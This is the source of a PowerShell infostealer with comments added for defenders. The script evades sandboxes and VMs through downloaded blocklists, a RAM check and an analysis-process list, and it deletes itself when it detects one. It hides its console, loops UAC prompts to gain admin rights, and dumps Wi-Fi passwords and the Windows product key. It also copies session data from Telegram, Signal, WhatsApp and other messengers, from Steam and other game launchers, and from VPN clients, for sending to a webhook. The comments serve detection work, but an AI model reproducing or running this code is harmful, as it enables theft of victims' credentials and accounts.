# Single Instance (no overloads)
# Single-instance guard. Creates a named, manual-reset EventWaitHandle in the
# Global namespace keyed on the GUID below; the [ref] $CreatedNew out-parameter
# reports whether the handle was newly created. If it already existed the
# script throws, otherwise it continues into Invoke-ANTITOTAL (defined later
# in this file).
# Defender note: the kernel object name "Global\<GUID>" is a host artifact that
# can be enumerated while the script is running.
function Compare-Mutex {
$AppId = "16fcb8bb-e281-472d-a9f6-39f0f32f19f2" # This GUID string is changeable
$CreatedNew = $false
# $AppID and $AppId are the same variable (PowerShell variable names are
# case-insensitive); the handle name therefore embeds the GUID above.
$script:SingleInstanceEvent = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$AppID", ([ref] $CreatedNew)
if( -not $CreatedNew ) {
throw "An instance of this script is already running."
} else {
Invoke-ANTITOTAL
}
}
# Script-level configuration.
# WPF assemblies are loaded for the [System.Windows.MessageBox] used by make_error_page.
Add-Type -AssemblyName PresentationCore,PresentationFramework
# Exfiltration endpoint (a placeholder in this copy). Later in the file the
# collected data is POSTed to it as JSON with Invoke-WebRequest.
$webhook = "YOUR_WEBHOOK_HERE"
$debug_mode = $false
# $udc_mode is assigned here but is not read anywhere in the visible portion of the file.
$udc_mode = $true
# Outside debug mode, suppress non-terminating errors and progress output so
# nothing is displayed to the user.
if (!($debug_mode)) {
$ErrorActionPreference = 'SilentlyContinue'
$ProgressPreference = 'SilentlyContinue'
}
# Returns $true when the current Windows identity holds the built-in
# Administrators role, $false otherwise. Used by Request-Admin as its loop condition.
function Invoke-Admin_Check {
$test = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
return $test
}
# Hides the host console window via P/Invoke: GetConsoleWindow (kernel32) to
# obtain the handle, then ShowWindow (user32) with nCmdShow = 0 (SW_HIDE).
# Defender note: a PowerShell process compiling a Console.Window type with these
# two imports is an observable pattern in script-block / module logging.
function Hide-Console
{
# Only compile the helper type once per session.
if (-not ("Console.Window" -as [type])) {
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
'
}
$consolePtr = [Console.Window]::GetConsoleWindow()
# Return value discarded; 0 == SW_HIDE.
$null = [Console.Window]::ShowWindow($consolePtr, 0)
}
# Shows a modal WPF message box titled "ERROR" with an OK button (0) and the
# error icon (16). Used by the environment checks before they terminate the script.
#   $error_message - text displayed in the dialog (mandatory)
function make_error_page {
param(
[Parameter(Mandatory=$true)]
[string]$error_message
)
$null = [System.Windows.MessageBox]::Show("$error_message","ERROR",0,16)
}
# Environment check: compares this host's MAC address(es) against $mac_addresses.
# Called from Invoke-ANTITOTAL with the raw text of a downloaded list as the
# single argument. Returns $true on a match, $false otherwise.
function Search-Mac ($mac_addresses) {
# MACs of all IP-enabled adapters, joined into one comma-separated string.
$pc_mac = (Get-WmiObject win32_networkadapterconfiguration -ComputerName $env:COMPUTERNAME | Where-Object{$_.IpEnabled -Match "True"} | Select-Object -Expand macaddress) -join ","
ForEach ($mac123 in $mac_addresses) {
# -contains is the collection-membership operator; its left operand here is
# the single joined string, so this compares the whole string to $mac123.
if ($pc_mac -contains $mac123) {
return $true
}
}
return $false
}
# Environment check: looks up the host's public IP and compares it against
# $ip_addresses. Returns $true on a match, $false otherwise.
# Defender note: the outbound HTTPS request to api.ipify.org is a network
# indicator; the same lookup is repeated later in the file.
function Search-IP ($ip_addresses) {
$pc_ip = Invoke-WebRequest -Uri "https://api.ipify.org" -UseBasicParsing
$pc_ip = $pc_ip.Content
ForEach ($ip123 in $ip_addresses) {
# -contains with a single string on the left compares the whole string.
if ($pc_ip -contains $ip123) {
return $true
}
}
return $false
}
# Environment check: compares the machine UUID (Win32_ComputerSystemProduct)
# against $hwids. Returns $true on a match, $false otherwise.
function Search-HWID ($hwids) {
$pc_hwid = Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
ForEach ($hwid123 in $hwids) {
# -contains with a single string on the left compares the whole string.
if ($pc_hwid -contains $hwid123) {
return $true
}
}
return $false
}
# Environment check: compares the current user name ($env:USERNAME) against
# $usernames. Returns $true on a match, $false otherwise.
function Search-Username ($usernames) {
$pc_username = $env:USERNAME
ForEach ($username123 in $usernames) {
# -contains with a single string on the left compares the whole string.
if ($pc_username -contains $username123) {
return $true
}
}
return $false
}
# Environment check: sums installed physical memory (in GB, rounded to 2 places)
# and terminates the whole script with a "RAM CHECK FAILED" dialog when it is
# below 6 GB. Defender note: analysis VMs provisioned with less RAM stop the
# sample here, before any collection happens.
function ram_check {
$ram = Get-WmiObject -Class Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | ForEach-Object {[Math]::Round(($_.Sum / 1GB),2)}
if ($ram -lt 6) {
make_error_page "RAM CHECK FAILED"
Start-Sleep -s 3
# 'exit' ends the script, not just this function.
exit
}
}
# Anti-analysis check. Runs ram_check, then looks for running processes whose
# names match a list of debuggers, sniffers, monitors and VM guest tools.
# If none is found it continues to Invoke-TASKS (not defined in the visible
# portion of this file); otherwise it prints the matches and deletes its own
# script file ($PSCommandPath).
# Defender note: the self-delete (Remove-Item on the script path) and the
# burst of Get-Process lookups are observable via process/file auditing.
function Invoke-ANTIVM {
ram_check
# Process names checked with Get-Process (no extension). Some entries are duplicated.
$processnames= @(
"autoruns",
"autorunsc",
"dumpcap",
"fiddler",
"fakenet",
"hookexplorer",
"immunitydebugger",
"httpdebugger",
"importrec",
"lordpe",
"petools",
"processhacker",
"resourcehacker",
"scylla_x64",
"sandman",
"sysinspector",
"tcpview",
"die",
"dumpcap",
"filemon",
"idaq",
"idaq64",
"joeboxcontrol",
"joeboxserver",
"ollydbg",
"proc_analyzer",
"procexp",
"procmon",
"pestudio",
"qemu-ga",
"qga",
"regmon",
"sniff_hit",
"sysanalyzer",
"tcpview",
"windbg",
"wireshark",
"x32dbg",
"x64dbg",
"vmwareuser",
"vmacthlp",
"vboxservice",
"vboxtray",
"xenservice"
)
# Collect the names that resolve to a running process; lookup errors are suppressed.
$detectedProcesses = $processnames | ForEach-Object {
$processName = $_
if (Get-Process -Name $processName -Erroraction SilentlyContinue) {
$processName
}
}
if ($null -eq $detectedProcesses) {
Invoke-TASKS
}
else {
Write-Output "Detected processes: $($detectedProcesses -join ', ')"
# Self-delete when an analysis tool is present.
Remove-Item $PSCommandPath -Force
}
}
# Sandbox/scanner evasion stage. Downloads four block-lists (MACs, IPs, HWIDs,
# user names) from the 6nz/virustotal-vm-blacklist GitHub repository and feeds
# the raw text of each to the matching Search-* function. A $true result shows
# a "Detected VM" dialog and terminates the script; otherwise control passes
# to Invoke-ANTIVM.
# Defender note: the four raw.githubusercontent.com URLs below are network
# indicators that precede any collection activity.
function Invoke-ANTITOTAL {
$urls = @(
"https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt",
"https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt",
"https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt",
"https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt"
)
# Index-aligned with $urls: $functions[$i] consumes the content of $urls[$i].
$functions = @(
"Search-Mac",
"Search-IP",
"Search-HWID",
"Search-Username"
)
for ($i = 0; $i -lt $urls.Count; $i++) {
$url = $urls[$i]
$functionName = $functions[$i]
$result = Invoke-WebRequest -Uri $url -UseBasicParsing
if ($result.StatusCode -eq 200) {
# Whole response body is passed as one string argument to the Search-* function.
$content = $result.Content
$function = Get-Command -Name $functionName
$output = & $function.Name $content
if ($output -eq $true) {
make_error_page "Detected VM"
Start-Sleep -s 3
# 'exit' ends the script, not just this function.
exit
}
}
else {
# Non-200 responses are ignored (an empty string is emitted to the pipeline).
""
}
}
Invoke-ANTIVM
}
# Elevation loop. While the current process is not an administrator, relaunches
# this script with Start-Process -Verb RunAs (which raises a UAC prompt),
# bypassing execution policy and hiding the window outside debug mode, then
# exits the current (unelevated) instance. The empty catch swallows any failure
# of Start-Process — presumably a declined UAC prompt — so the loop re-prompts.
# Defender note: repeated UAC prompts for powershell.exe with
# "-ExecutionPolicy Bypass -WindowStyle hidden -File" is the observable pattern.
function Request-Admin {
while(!(Invoke-Admin_Check)) {
try {
if ($debug_mode) {
Start-Process "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
} else {
Start-Process "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle hidden -File `"$PSCommandPath`"" -Verb RunAs
}
# Only reached when the elevated relaunch was started; ends this instance.
exit
}
catch {}
}
}
function Backup-Data {
$folder_general = "$env:APPDATA\KDOT\DATA"
$folder_messaging = "$env:APPDATA\KDOT\DATA\Messaging Sessions"
$folder_gaming = "$env:APPDATA\KDOT\DATA\Gaming Sessions"
$folder_crypto = "$env:APPDATA\KDOT\DATA\Crypto Wallets"
$folder_vpn = "$env:APPDATA\KDOT\DATA\VPN Clients"
$folder_email = "$env:APPDATA\KDOT\DATA\Email Clients"
$important_files = "$env:APPDATA\KDOT\DATA\Important Files"
$browser_data = "$env:APPDATA\KDOT\DATA\Browser Data"
New-Item -ItemType Directory -Path $folder_general -Force
New-Item -ItemType Directory -Path $folder_messaging -Force
New-Item -ItemType Directory -Path $folder_gaming -Force
New-Item -ItemType Directory -Path $folder_crypto -Force
New-Item -ItemType Directory -Path $folder_vpn -Force
New-Item -ItemType Directory -Path $browser_data -Force
New-Item -ItemType Directory -Path $folder_email -Force
New-Item -ItemType Directory -Path $important_files -Force
#bulk data
$ip = Invoke-WebRequest -Uri "https://api.ipify.org" -UseBasicParsing
$ip = $ip.Content
$ip > $folder_general\ip.txt
$lang = (Get-WinUserLanguageList).LocalizedName
$date = (get-date).toString("r")
Get-ComputerInfo > $folder_general\system_info.txt
$osversion = (Get-WmiObject -class Win32_OperatingSystem).Caption
$osbuild = (Get-ItemProperty -Path c:\windows\system32\hal.dll).VersionInfo.FileVersion
$displayversion = (Get-Item "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion").GetValue('DisplayVersion')
$model = (Get-WmiObject -Class:Win32_ComputerSystem).Model
$uuid = Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
$uuid > $folder_general\uuid.txt
$cpu = Get-WmiObject -Class Win32_Processor | Select-Object -ExpandProperty Name
$cpu > $folder_general\cpu.txt
$gpu = (Get-WmiObject Win32_VideoController).Name
$gpu > $folder_general\GPU.txt
$format = " GB"
$total = Get-CimInstance Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | ForEach-Object {"{0:N2}" -f ([math]::round(($_.Sum / 1GB),2))}
$raminfo = "$total" + "$format"
$mac = (Get-WmiObject win32_networkadapterconfiguration -ComputerName $env:COMPUTERNAME | Where-Object{$_.IpEnabled -Match "True"} | Select-Object -Expand macaddress) -join ","
$mac > $folder_general\mac.txt
$username = $env:USERNAME
$hostname = $env:COMPUTERNAME
netstat -ano > $folder_general\netstat.txt
$mfg = (Get-WmiObject win32_computersystem).Manufacturer
#end of bulk data
# Nested helper of Backup-Data. Returns the time since last boot as a
# "N days N hours N minutes N seconds" string, computed from
# Win32_OperatingSystem.LastBootUpTime.
function Get-Uptime {
# NOTE(review): $computername is not assigned anywhere in the visible portion
# of the file (the enclosing scope sets $hostname, not $computername).
$ts = (Get-Date) - (Get-CimInstance -ClassName Win32_OperatingSystem -ComputerName $computername).LastBootUpTime
$uptimedata = '{0} days {1} hours {2} minutes {3} seconds' -f $ts.Days, $ts.Hours, $ts.Minutes, $ts.Seconds
$uptimedata
}
$uptime = Get-Uptime
# Nested helper of Backup-Data. Emits the displayName of every registered
# antivirus product from the root\SecurityCenter2 WMI namespace.
function get-installed-av {
$wmiQuery = "SELECT * FROM AntiVirusProduct"
# @psboundparameters splats this function's bound parameters; it declares none.
$AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters
$AntivirusProduct.displayName
}
$avlist = get-installed-av -autosize | Format-Table | out-string
$wifipasslist = netsh wlan show profiles | Select-String "\:(.+)$" | ForEach-Object{ $_ } | ForEach-Object{(netsh wlan show profile name="$($_.Matches.Groups[1].Value.Trim())" key=clear)} | Select-String "Key Content\W+\:(.+)$" | ForEach-Object{$_.Matches.Groups[1].Value.Trim()} | ForEach-Object{[PSCustomObject]@{ PROFILE_NAME=$($_.Matches.Groups[1].Value.Trim());PASSWORD=$_ }} | Out-String
$wifi = $wifipasslist | out-string
$wifi > $folder_general\WIFIPasswords.txt
$width = (((Get-WmiObject -Class Win32_VideoController).VideoModeDescription -split '\n')[0] -split ' ')[0]
$height = (((Get-WmiObject -Class Win32_VideoController).VideoModeDescription -split '\n')[0] -split ' ')[2]
$split = "x"
$screen = "$width" + "$split" + "$height"
#misc data
Get-CimInstance Win32_StartupCommand | Select-Object Name, command, Location, User | Format-List > $folder_general\StartUpApps.txt
Get-WmiObject win32_service |Where-Object State -match "running" | Select-Object Name, DisplayName, PathName, User | Sort-Object Name | Format-Table -wrap -autosize > $folder_general\running-services.txt
Get-WmiObject win32_process | Select-Object Name,Description,ProcessId,ThreadCount,Handles,Path | Format-Table -wrap -autosize > $folder_general\running-applications.txt
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table > $folder_general\Installed-Applications.txt
Get-NetAdapter | Format-Table Name,InterfaceDescription,PhysicalMediaType,NdisPhysicalMedium -AutoSize > $folder_general\NetworkAdapters.txt
# Nested helper of Backup-Data. Emits one PSCustomObject per logical disk with
# a non-zero size: drive letter, volume name, total size, free space and used
# space (GB, with percentages).
function diskdata {
$disks = get-wmiobject -class "Win32_LogicalDisk" -namespace "root\CIMV2"
$results = foreach ($disk in $disks) {
# Skip disks reporting zero size (also avoids division by zero below).
if ($disk.Size -gt 0) {
$SizeOfDisk = [math]::round($disk.Size/1GB, 0)
$FreeSpace = [math]::round($disk.FreeSpace/1GB, 0)
$usedspace = [math]::round(($disk.size - $disk.freespace) / 1GB, 2)
# Percentages are computed from the rounded GB values, then truncated to int.
[int]$FreePercent = ($FreeSpace/$SizeOfDisk) * 100
[int]$usedpercent = ($usedspace/$SizeOfDisk) * 100
[PSCustomObject]@{
Drive = $disk.Name
Name = $disk.VolumeName
"Total Disk Size" = "{0:N0} GB" -f $SizeOfDisk
"Free Disk Size" = "{0:N0} GB ({1:N0} %)" -f $FreeSpace, ($FreePercent)
"Used Space" = "{0:N0} GB ({1:N0} %)" -f $usedspace, ($usedpercent)
}
}
}
$results
}
$alldiskinfo = diskdata | out-string
$alldiskinfo > $folder_general\diskinfo.txt
# Nested helper of Backup-Data. Reads the BackupProductKeyDefault value from
# HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
# and returns it; any failure yields the string "No product key found".
# Defender note: access to this registry value is a useful audit point for
# license-key harvesting.
function Get-ProductKey {
try {
$regPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform'
$keyName = 'BackupProductKeyDefault'
$backupProductKey = Get-ItemPropertyValue -Path $regPath -Name $keyName
return $backupProductKey
} catch {
return "No product key found"
}
}
Get-ProductKey > $folder_general\productkey.txt
# All Messaging Sessions
# Telegram Desktop session collection (nested in Backup-Data; uses
# $folder_messaging from the enclosing scope). Returns immediately when the
# tdata folder is absent; otherwise terminates any running "telegram" process
# and archives tdata (minus the excluded entries) to Telegram.zip.
# Defender note: an unexpected termination of Telegram followed by a zip write
# under %APPDATA%\KDOT\DATA is the observable sequence.
function telegramstealer {
$processname = "telegram"
$pathtele = "$env:userprofile\AppData\Roaming\Telegram Desktop\tdata"
if (!(Test-Path $pathtele)) {return}
# Stop the client so its files are not locked; errors are ignored.
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname -ErrorAction SilentlyContinue | Stop-Process }} catch {}
$destination = "$folder_messaging\Telegram.zip"
$exclude = @("_*.config","dumps","tdummy","emoji","user_data","user_data#2","user_data#3","user_data#4","user_data#5","user_data#6","*.json","webview")
$files = Get-ChildItem -Path $pathtele -Exclude $exclude
Compress-Archive -Path $files -DestinationPath $destination -CompressionLevel Fastest -Force
}
# Element Session Stealer
# Element (Matrix client) session collection. Returns when the profile folder
# is absent; otherwise stops any "element" process and copies the browser
# storage directories and sso-sessions.json into $folder_messaging\Element.
function elementstealer {
$processname = "element"
$elementfolder = "$env:userprofile\AppData\Roaming\Element"
if (!(Test-Path $elementfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname -ErrorAction SilentlyContinue | Stop-Process }} catch {}
$element_session = "$folder_messaging\Element"
New-Item -ItemType Directory -Force -Path $element_session
Copy-Item -Path "$elementfolder\databases" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
Copy-Item -Path "$elementfolder\Local Storage" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
Copy-Item -Path "$elementfolder\Session Storage" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
Copy-Item -Path "$elementfolder\IndexedDB" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
Copy-Item -Path "$elementfolder\sso-sessions.json" -Destination $element_session -Recurse -force -ErrorAction SilentlyContinue
}
# ICQ Session Stealer
# ICQ session collection. Returns when the profile folder is absent; otherwise
# stops any "icq" process and copies the "0001" profile directory into
# $folder_messaging\ICQ.
function icqstealer {
$processname = "icq"
$icqfolder = "$env:userprofile\AppData\Roaming\ICQ"
if (!(Test-Path $icqfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname -ErrorAction SilentlyContinue | Stop-Process }} catch {}
$icq_session = "$folder_messaging\ICQ"
New-Item -ItemType Directory -Force -Path $icq_session -ErrorAction SilentlyContinue
Copy-Item -Path "$icqfolder\0001" -Destination $icq_session -Recurse -force -ErrorAction SilentlyContinue
}
# Signal Session Stealer
# Signal Desktop session collection. Returns when the profile folder is absent;
# otherwise stops any "signal" process and copies the storage directories,
# the sql directory and config.json into $folder_messaging\Signal.
function signalstealer {
$processname = "signal"
$signalfolder = "$env:userprofile\AppData\Roaming\Signal"
if (!(Test-Path $signalfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$signal_session = "$folder_messaging\Signal"
New-Item -ItemType Directory -Force -Path $signal_session
Copy-Item -Path "$signalfolder\databases" -Destination $signal_session -Recurse -force
Copy-Item -Path "$signalfolder\Local Storage" -Destination $signal_session -Recurse -force
Copy-Item -Path "$signalfolder\Session Storage" -Destination $signal_session -Recurse -force
Copy-Item -Path "$signalfolder\sql" -Destination $signal_session -Recurse -force
Copy-Item -Path "$signalfolder\config.json" -Destination $signal_session -Recurse -force
}
# Viber Session Stealer
# Viber session collection. Returns when the ViberPC folder is absent; otherwise
# stops any "viber" process, copies files whose name starts with the config
# prefix, copies directories whose name looks like a phone number, and copies
# loose *.db/*.db-shm/*.db-wal files that do not sit next to such a directory.
# Destination is $folder_messaging\Viber.
function viberstealer {
$processname = "viber"
$viberfolder = "$env:userprofile\AppData\Roaming\ViberPC"
if (!(Test-Path $viberfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$viber_session = "$folder_messaging\Viber"
New-Item -ItemType Directory -Force -Path $viber_session
# Inside double quotes "$1" is a variable expansion (not a regex group); $1 is
# not assigned in the visible portion of the file.
$configfiles = @("config$1")
foreach($file in $configfiles) {
Get-ChildItem -path $viberfolder -Filter ([regex]::escape($file) + "*") -Recurse -File | ForEach-Object { Copy-Item -path $PSItem.FullName -Destination $viber_session }
}
# Matches directory names made of digits/spaces/dots with an optional leading "+" (phone-number-like).
$pattern = "^([\+|0-9 ][ 0-9.]{1,12})$"
$directories = Get-ChildItem -Path $viberFolder -Directory | Where-Object { $_.Name -match $pattern }
foreach ($directory in $directories) {
$destinationPath = Join-Path -Path $viber_session -ChildPath $directory.Name
Copy-Item -Path $directory.FullName -Destination $destinationPath -Force
}
$files = Get-ChildItem -Path $viberFolder -File -Recurse -Include "*.db", "*.db-shm", "*.db-wal" | Where-Object { -not $_.PSIsContainer }
foreach ($file in $files) {
$parentFolder = Split-Path -Path $file.FullName -Parent
$phoneNumberFolder = Get-ChildItem -Path $parentFolder -Directory | Where-Object { $_.Name -match $pattern}
if (-not $phoneNumberFolder) {
# $destinationPath here is whatever the previous loop left in it.
Copy-Item -Path $file.FullName -Destination $destinationPath
}
}
}
# Whatsapp Session Stealer
# WhatsApp Desktop (Store app) session collection. Stops any "whatsapp" process,
# locates the WhatsAppDesktop package folder under %LOCALAPPDATA%\Packages and
# copies its LocalState directory into $folder_messaging\Whatsapp.
function whatsappstealer {
$processname = "whatsapp"
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$whatsapp_session = "$folder_messaging\Whatsapp"
New-Item -ItemType Directory -Force -Path $whatsapp_session
$regexPattern = "WhatsAppDesktop"
$parentFolder = Get-ChildItem -Path "$env:localappdata\Packages" -Directory | Where-Object { $_.Name -match $regexPattern }
if ($parentFolder){
$localStateFolder = Get-ChildItem -Path $parentFolder.FullName -Filter "LocalState" -Recurse -Directory
if ($localStateFolder) {
$destinationPath = Join-Path -Path $whatsapp_session -ChildPath $localStateFolder.Name
Copy-Item -Path $localStateFolder.FullName -Destination $destinationPath -Recurse
}
}
}
# All Gaming Sessions
# Steam Session Stealer
# Steam session collection. Returns when the Steam install folder is absent;
# otherwise stops any "steam" process, copies the config directory and any
# files whose name starts with the ssfn prefix into $folder_gaming\Steam.
function steamstealer {
$processname = "steam"
$steamfolder = ("${Env:ProgramFiles(x86)}\Steam")
if (!(Test-Path $steamfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$steam_session = "$folder_gaming\Steam"
New-Item -ItemType Directory -Force -Path $steam_session
Copy-Item -Path "$steamfolder\config" -Destination $steam_session -Recurse -force
# Inside double quotes "$1" is a variable expansion; $1 is not assigned in the visible portion of the file.
$ssfnfiles = @("ssfn$1")
foreach($file in $ssfnfiles) {
Get-ChildItem -path $steamfolder -Filter ([regex]::escape($file) + "*") -Recurse -File | ForEach-Object { Copy-Item -path $PSItem.FullName -Destination $steam_session }
}
}
# Minecraft Session Stealer
# Minecraft / Lunar Client JSON collection into $folder_gaming\Minecraft.
# The Test-Path guard checks the destination folder, so the function returns
# unless that output folder already exists.
function minecraftstealer {
$minecraft_session = "$folder_gaming\Minecraft"
if (!(Test-Path $minecraft_session)) {return}
New-Item -ItemType Directory -Force -Path $minecraft_session
$minecraftfolder1 = $env:appdata + "\.minecraft"
$minecraftfolder2 = $env:userprofile + "\.lunarclient\settings\game"
Get-ChildItem $minecraftfolder1 -Include "*.json" -Recurse | Copy-Item -Destination $minecraft_session -ErrorAction SilentlyContinue
Get-ChildItem $minecraftfolder2 -Include "*.json" -Recurse | Copy-Item -Destination $minecraft_session -ErrorAction SilentlyContinue
}
# Epicgames Session Stealer
# Epic Games Launcher collection. Returns when the launcher data folder is
# absent; otherwise stops any "epicgameslauncher" process and copies
# Saved\Config, Saved\Logs and Saved\Data into $folder_gaming\EpicGames.
function epicgames_stealer {
$processname = "epicgameslauncher"
$epicgamesfolder = "$env:localappdata\EpicGamesLauncher"
if (!(Test-Path $epicgamesfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$epicgames_session = "$folder_gaming\EpicGames"
New-Item -ItemType Directory -Force -Path $epicgames_session
Copy-Item -Path "$epicgamesfolder\Saved\Config" -Destination $epicgames_session -Recurse -force
Copy-Item -Path "$epicgamesfolder\Saved\Logs" -Destination $epicgames_session -Recurse -force
Copy-Item -Path "$epicgamesfolder\Saved\Data" -Destination $epicgames_session -Recurse -force
}
# Ubisoft Session Stealer
# Ubisoft Connect collection. Returns when the launcher data folder is absent;
# otherwise stops any "upc" process and copies the whole folder into
# $folder_gaming\Ubisoft.
function ubisoftstealer {
$processname = "upc"
$ubisoftfolder = "$env:localappdata\Ubisoft Game Launcher"
if (!(Test-Path $ubisoftfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$ubisoft_session = "$folder_gaming\Ubisoft"
New-Item -ItemType Directory -Force -Path $ubisoft_session
Copy-Item -Path "$ubisoftfolder" -Destination $ubisoft_session -Recurse -force
}
# EA Session Stealer
# EA app collection. Returns when the Electronic Arts data folder is absent, and
# also returns unless the destination folder $folder_gaming\Electronic Arts
# already exists (second Test-Path guard). Otherwise stops any "eadesktop"
# process and copies the whole data folder to the destination.
function electronic_arts {
$processname = "eadesktop"
$eafolder = "$env:localappdata\Electronic Arts"
if (!(Test-Path $eafolder)) {return}
$ea_session = "$folder_gaming\Electronic Arts"
if (!(Test-Path $ea_session)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
New-Item -ItemType Directory -Force -Path $ea_session
Copy-Item -Path "$eafolder" -Destination $ea_session -Recurse -force
}
# Growtopia Stealer
# Growtopia collection. Returns when the game data folder is absent; otherwise
# stops any "growtopia" process and copies save.dat into $folder_gaming\Growtopia.
function growtopiastealer {
$processname = "growtopia"
$growtopiafolder = "$env:localappdata\Growtopia"
if (!(Test-Path $growtopiafolder)) {return}
$growtopia_session = "$folder_gaming\Growtopia"
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
New-Item -ItemType Directory -Force -Path $growtopia_session
Copy-Item -Path "$growtopiafolder\save.dat" -Destination $growtopia_session -Recurse -force
}
# All VPN Sessions
# NordVPN
# NordVPN client data collection. Returns when the client's local data folder is
# absent; otherwise stops any "nordvpn" process and copies, into
# $folder_vpn\NordVPN: directories and files whose name matches the
# "<name>.exe_Path_<hash>" pattern, the ProfileOptimization directory and
# libmoose.db.
function nordvpnstealer {
$processname = "nordvpn"
$nordvpnfolder = "$env:localappdata\nordvpn"
if (!(Test-Path $nordvpnfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$nordvpn_account = "$folder_vpn\NordVPN"
New-Item -ItemType Directory -Force -Path $nordvpn_account
$pattern = "^([A-Za-z]+\.exe_Path_[A-Za-z0-9]+)$"
$directories = Get-ChildItem -Path $nordvpnfolder -Directory | Where-Object { $_.Name -match $pattern }
$files = Get-ChildItem -Path $nordvpnfolder -File | Where-Object { $_.Name -match $pattern }
foreach ($directory in $directories) {
$destinationPath = Join-Path -Path $nordvpn_account -ChildPath $directory.Name
Copy-Item -Path $directory.FullName -Destination $destinationPath -Recurse -Force
}
foreach ($file in $files) {
$destinationPath = Join-Path -Path $nordvpn_account -ChildPath $file.Name
Copy-Item -Path $file.FullName -Destination $destinationPath -Force
}
Copy-Item -Path "$nordvpnfolder\ProfileOptimization" -Destination $nordvpn_account -Recurse -force
Copy-Item -Path "$nordvpnfolder\libmoose.db" -Destination $nordvpn_account -Recurse -force
}
# ProtonVPN
# ProtonVPN client data collection. Returns when the client's local data folder
# is absent; otherwise stops any "protonvpn" process and copies, into
# $folder_vpn\ProtonVPN: directories and files named "ProtonVPN_Url_<hash>"
# plus Startup.profile.
function protonvpnstealer {
$processname = "protonvpn"
$protonvpnfolder = "$env:localappdata\protonvpn"
if (!(Test-Path $protonvpnfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$protonvpn_account = "$folder_vpn\ProtonVPN"
New-Item -ItemType Directory -Force -Path $protonvpn_account
$pattern = "^(ProtonVPN_Url_[A-Za-z0-9]+)$"
$directories = Get-ChildItem -Path $protonvpnfolder -Directory | Where-Object { $_.Name -match $pattern }
$files = Get-ChildItem -Path $protonvpnfolder -File | Where-Object { $_.Name -match $pattern }
foreach ($directory in $directories) {
$destinationPath = Join-Path -Path $protonvpn_account -ChildPath $directory.Name
Copy-Item -Path $directory.FullName -Destination $destinationPath -Recurse -Force
}
foreach ($file in $files) {
$destinationPath = Join-Path -Path $protonvpn_account -ChildPath $file.Name
Copy-Item -Path $file.FullName -Destination $destinationPath -Force
}
Copy-Item -Path "$protonvpnfolder\Startup.profile" -Destination $protonvpn_account -Recurse -force
}
#Surfshark VPN
# Surfshark client data collection. Returns when the roaming data folder is
# absent; otherwise stops any "Surfshark" process and copies the four listed
# .dat files (searched recursively) into $folder_vpn\Surfshark.
function surfsharkvpnstealer {
$processname = "Surfshark"
$surfsharkvpnfolder = "$env:appdata\Surfshark"
if (!(Test-Path $surfsharkvpnfolder)) {return}
try {if (Get-Process $processname -ErrorAction SilentlyContinue ) {Get-Process -Name $processname | Stop-Process }} catch {}
$surfsharkvpn_account = "$folder_vpn\Surfshark"
New-Item -ItemType Directory -Force -Path $surfsharkvpn_account
Get-ChildItem $surfsharkvpnfolder -Include @("data.dat", "settings.dat", "settings-log.dat", "private_settings.dat") -Recurse | Copy-Item -Destination $surfsharkvpn_account
}
# Runs every messaging, gaming and VPN collector defined above, in order.
# Each collector is self-guarding (returns when its source folder is absent),
# so a failure in one does not stop the next; errors are suppressed by the
# script-level $ErrorActionPreference unless debug mode is on.
